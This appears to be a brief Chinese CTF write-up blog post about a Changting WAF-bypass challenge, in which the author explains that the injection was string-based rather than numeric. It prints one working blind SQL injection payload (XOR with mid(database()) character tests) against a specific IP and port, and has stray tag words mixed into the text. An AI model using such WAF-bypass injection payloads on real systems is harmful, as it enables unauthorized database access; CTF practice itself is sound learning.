长亭出题思路很广啊,666php
是一道绕waf的题,一开始被欺骗觉得是数字型注入,但过滤了不少很严格,最后才知道是字符型,哈哈哈,payload以下:tab
http://54.222.188.152:25718/index.php?id=1'^(mid(database()from(1)for(1))in(0x77))^'1#注入
看来之后仍是要多打打比赛,老年人不练练思路跟不上啊比赛